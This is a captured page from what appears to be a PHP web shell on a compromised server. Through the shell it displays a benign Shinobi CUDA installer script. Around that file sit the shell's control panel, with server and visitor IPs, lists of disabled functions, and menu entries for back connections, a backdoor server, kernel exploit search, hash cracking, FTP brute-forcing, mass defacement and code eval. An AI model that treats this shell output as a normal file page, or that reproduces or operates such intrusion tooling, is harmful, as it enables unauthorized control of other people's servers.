IP Address: 80.252.133.24:443 You: 216.73.216.93
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ distr/ Shinobi/ INSTALL/ - drwxr-xr-x |
Viewing file:
Select action/file-type: #!/bin/sh echo "------------------------------------------" echo "-- Installing CUDA Toolkit and CUDA DNN --" echo "------------------------------------------" # Install CUDA Drivers and Toolkit echo "=============" echo " Detecting Ubuntu Version" echo "=============" getubuntuversion=$(lsb_release -r | awk '{print $2}' | cut -d . -f1) echo "=============" echo " Ubuntu Version: $getubuntuversion" echo "=============" if [ "$getubuntuversion" = "17" ] || [ "$getubuntuversion" > "17" ]; then wget https://cdn.shinobi.video/installers/cuda-repo-ubuntu1710_9.2.148-1_amd64.deb -O cuda.deb sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1710/x86_64/7fa2af80.pub sudo dpkg -i --force-overwrite cuda.deb fi if [ "$getubuntuversion" = "16" ]; then wget https://cdn.shinobi.video/installers/cuda-repo-ubuntu1604_9.2.148-1_amd64.deb -O cuda.deb sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/7fa2af80.pub sudo dpkg -i --force-overwrite cuda.deb fi sudo apt-get update -y if [ "$getubuntuversion" = "17" ] || [ "$getubuntuversion" > "17" ]; then sudo apt-get -o Dpkg::Options::="--force-overwrite" install cuda -y --no-install-recommends sudo apt-get -o Dpkg::Options::="--force-overwrite" install --fix-broken -y fi if [ "$getubuntuversion" = "16" ]; then sudo apt-get install libcuda1-384 -y --no-install-recommends sudo apt-get install nvidia-cuda-toolkit -y fi # Install CUDA DNN wget https://cdn.shinobi.video/installers/libcudnn7_7.2.1.38-1+cuda9.2_amd64.deb -O cuda-dnn.deb sudo dpkg -i cuda-dnn.deb wget https://cdn.shinobi.video/installers/libcudnn7-dev_7.2.1.38-1+cuda9.2_amd64.deb -O cuda-dnn-dev.deb sudo dpkg -i cuda-dnn-dev.deb echo "-- Cleaning Up --" # Cleanup sudo rm cuda.deb sudo rm cuda-dnn.deb sudo rm cuda-dnn-dev.deb echo "------------------------------" echo "Reboot is required. Do it now?" echo "------------------------------" echo "(y)es or (N)o. Default is No." read rebootTheMachineHomie if [ "$rebootTheMachineHomie" = "y" ] || [ "$rebootTheMachineHomie" = "Y" ]; then sudo reboot fi |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |